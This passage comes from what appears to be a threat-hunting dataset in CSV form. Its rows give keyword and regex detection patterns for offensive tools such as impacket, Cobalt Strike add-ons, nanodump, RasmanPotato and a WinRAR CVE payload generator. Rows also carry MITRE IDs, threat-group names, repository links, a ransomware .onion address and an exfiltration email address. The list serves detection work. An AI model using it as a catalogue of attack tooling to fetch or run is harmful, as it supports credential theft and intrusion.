Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","56225"
"*raiseChild.py -target-exec *",".{0,1000}raiseChild\.py\s\-target\-exec\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56226"
"*raiseChild.py*",".{0,1000}raiseChild\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","56227"
"*rajkumardusad/onex*",".{0,1000}rajkumardusad\/onex.{0,1000}","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1105 - T1078 - T1059 - T1087","TA0007 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","N/A","","N/A","","","","56228"
"*rajkumardusad/Tool-X*",".{0,1000}rajkumardusad\/Tool\-X.{0,1000}","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/rajkumardusad/Tool-X","1","1","#linux","N/A","N/A","","N/A","","","","56229"
"*rakeem.osias@foreastate.com*",".{0,1000}rakeem\.osias\@foreastate\.com.{0,1000}","offensive_tool_keyword","Dispossessor","email used by the Dispossessor ransomware group notes for data exfiltration","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Data Exfiltration","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#email","N/A","10","10","N/A","N/A","N/A","N/A","56230"
"*RalfHacker/Kerbeus-BOF*",".{0,1000}RalfHacker\/Kerbeus\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","56231"
"*RalphDesmangles/22f580655f479f189c1de9e7720776f1*",".{0,1000}RalphDesmangles\/22f580655f479f189c1de9e7720776f1.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0008","N/A","N/A","Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","1","N/A","N/A","8","8","N/A","N/A","N/A","N/A","56232"
"*RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD*",".{0,1000}RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56233"
"*random_c2_profile*",".{0,1000}random_c2_profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","56234"
"*random_c2profile.*",".{0,1000}random_c2profile\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","56235"
"*random_user_agent.params*",".{0,1000}random_user_agent\.params.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","56236"
"*random_user_agent.user_agent*",".{0,1000}random_user_agent\.user_agent.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","56237"
"*randomalice1986@*",".{0,1000}randomalice1986\@.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","#email","email user name","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","56238"
"*-RandomAttackPath -Token*",".{0,1000}\-RandomAttackPath\s\-Token.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","0","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","56239"
"*randombob1986@*",".{0,1000}randombob1986\@.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","#email","email user name","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","56240"
"*randomize_sw2_seed.py*",".{0,1000}randomize_sw2_seed\.py.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","56241"
"*Ransom:Win32/Sodinokibi*",".{0,1000}Ransom\:Win32\/Sodinokibi.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","56251"
"*Ransomware POC tool that encrypts a given directory*",".{0,1000}Ransomware\sPOC\stool\sthat\sencrypts\sa\sgiven\sdirectory.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","56256"
"*Ransomware.dll*",".{0,1000}Ransomware\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","56257"
"*Ransomware.pdb*",".{0,1000}Ransomware\.pdb.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","56258"
"*ransomware_config.py*",".{0,1000}ransomware_config\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","56259"
"*ransomware_payload.py*",".{0,1000}ransomware_payload\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","56260"
"*Ransomware-E20F7CED-42AD-485E-BE4D-DE21DCE58EC0.json*",".{0,1000}Ransomware\-E20F7CED\-42AD\-485E\-BE4D\-DE21DCE58EC0\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","56261"
"*RansomwarePoc.cpp*",".{0,1000}RansomwarePoc\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","56262"
"*RansomwarePoc.exe*",".{0,1000}RansomwarePoc\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","56263"
"*RansomwarePoc\RansomwarePoc*",".{0,1000}RansomwarePoc\\RansomwarePoc.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","56264"
"*ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd.onion*",".{0,1000}ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56265"
"*ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd.onion*",".{0,1000}ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56266"
"*ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd.onion.ly*",".{0,1000}ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56267"
"*ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd.onion.ly*",".{0,1000}ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56268"
"*rapid7.github.io/metasploit-framework/api/*",".{0,1000}rapid7\.github\.io\/metasploit\-framework\/api\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","56270"
"*rapid7/metasploit-omnibus*",".{0,1000}rapid7\/metasploit\-omnibus.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","56271"
"*Rar a -v3g -k -r -s -m3 *",".{0,1000}Rar\sa\s\-v3g\s\-k\s\-r\s\-s\s\-m3\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","56273"
"*rar2john *",".{0,1000}rar2john\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","56274"
"*rar2john.*",".{0,1000}rar2john\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","56275"
"*rarce *.pdf *.rar*",".{0,1000}rarce\s.{0,1000}\.pdf\s.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","56276"
"*rarce *.rar*",".{0,1000}rarce\s.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","56277"
"*rarce-1.0.0.tar.gz*",".{0,1000}rarce\-1\.0\.0\.tar\.gz.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","56278"
"*rarce-1.0.0-py3-none-any.whl*",".{0,1000}rarce\-1\.0\.0\-py3\-none\-any\.whl.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","56279"
"*rasman*whoami*",".{0,1000}rasman.{0,1000}whoami.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","56280"
"*RasMan.vcxproj*",".{0,1000}RasMan\.vcxproj.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","56281"
"*rasman_c.c*",".{0,1000}rasman_c\.c.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","56282"
"*rasman_h.h*",".{0,1000}rasman_h\.h.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","56283"
